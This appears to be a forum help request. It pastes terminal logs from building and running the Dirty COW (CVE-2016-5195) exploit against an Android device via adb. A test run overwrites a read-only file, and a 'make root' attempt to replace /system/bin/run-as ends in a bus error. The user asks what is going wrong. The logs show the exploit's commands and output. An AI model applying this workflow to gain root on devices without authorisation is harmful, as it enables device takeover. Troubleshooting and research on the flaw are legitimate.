Running make root:
[eloy@t480 CVE-2016-5195]$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-17
make[1]: Entering directory `/home/eloy/CVE-2016-5195'
[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory `/home/eloy/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file pushed, 0 skipped. 29.5 MB/s (17880 bytes in 0.001s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
libs/armeabi-v7a/run-as: 1 file pushed, 0 skipped. 79.8 MB/s (13784 bytes in 0.000s)
adb shell 'cat /system/bin/run-as > /data/local/tmp/run-as-original'
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as --no-pad'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: source file size (13784) and destination file size (9464) differ
corruption?
[*] size 13784
[*] mmap 0x401f6000
[*] currently 0x401f6000=464c457f
[*] using ptrace method
[*] check thread starts, address 0x401f6000, size 13784
[*] ptrace thread starts, address 0x401f6000, size 13784
[*] madvise thread starts, address 0x401f6000, size 13784
Bus error
However, running make test:
[eloy@t480 CVE-2016-5195]$ make test
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-17
make[1]: Entering directory `/home/eloy/CVE-2016-5195'
[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory `/home/eloy/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file pushed, 0 skipped. 59.9 MB/s (17880 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push test.sh /data/local/tmp/test.sh
test.sh: 1 file pushed, 0 skipped. 2.7 MB/s (367 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell shell 18 2023-12-13 23:58 test
-rwxrwxrwx shell shell 367 2023-12-13 22:56 test.sh
-r--r--r-- shell shell 18 2023-12-13 23:58 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0x40175000
[*] currently 0x40175000=72756f79
[*] using ptrace method
[*] check thread starts, address 0x40175000, size 18
[*] ptrace thread starts, address 0x40175000, size 18
[*] madvise thread starts, address 0x40175000, size 18
[*] check thread stops, patch successful, iterations 3
[*] ptrace thread stops, return code sum 0, iterations 4047
[*] finished pid=3302 sees 0x40175000=6e6c7576
[*] madvise thread stops, return code sum 0, iterations 65420
[*] finished pid=0 sees 0x40175000=6e6c7576
adb shell 'cat /data/local/tmp/test2'
vulnerable!!!!!!!
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121 vulnerable!!!!!!
00000010: 210d 0a !..
What is going wrong here?
Running
make root:However, running
make test:What is going wrong here?